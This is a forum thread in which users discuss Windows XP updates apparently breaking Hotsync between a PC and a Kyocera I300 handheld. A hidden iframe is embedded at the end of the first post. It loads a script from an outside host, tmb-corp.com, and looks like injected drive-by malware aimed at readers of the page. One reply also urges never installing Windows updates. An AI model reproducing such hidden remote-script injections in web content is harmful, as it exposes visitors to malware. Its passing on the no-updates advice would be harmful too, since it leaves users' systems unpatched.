Windows Update vs. Palm Desktop Conflict?

I Hotsynced my I300 last night successfully. This afternoon, I installed a number of Windows Update files. Later, I attempted to Hotsync the I300 again and got no Hotsync activity or confirmation. After fumbling around with various settings unsuccessfully, I used "System Restore" on my HP Desktop to reconfigure the PC to a time prior to installing the Windows updates. Now the Hotsync manager works again. Has anyone run into this problem before? I really don't like to run my PC without the latest Windows updates but I NEED a successful interaction between my PC and I300 even more.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

xp is the biggest pile of crap from microsoft ever. everything you do and everything you update has an effect on all of your files and programs.

BEST THING TO DO IS NOT TO DO IT AT ALL WITH XP.NO UPDATES NO CHANGES NO CRASHES.

hell my wma doesnt have enough memmory to work now because of all the updates and bs i have had to do. every day i have a new xp update in my mailbox for xp.

and every timwe its another crash shortly after doing these updates.

also the i300 and desktop 4.1 were not written for xp. maybe thats why nothing works on it.
my i500 is more obsolete than your ti-99 or apple IIe

Thanks for the info, macmetal. I think I'll run naked without further updates; I've experienced problems too after XP updates in the past but was eventually able to fix/work around them.

I love my I300 but am really looking forward to the XDA II, new Thera or possibly the rumored HP WANDA units sometime early next year. An all in one machine appeals to me; lugging around a tricked out HP 3955 and the I300 together is getting a little old.

I guess I'll be a real MS zombie then.
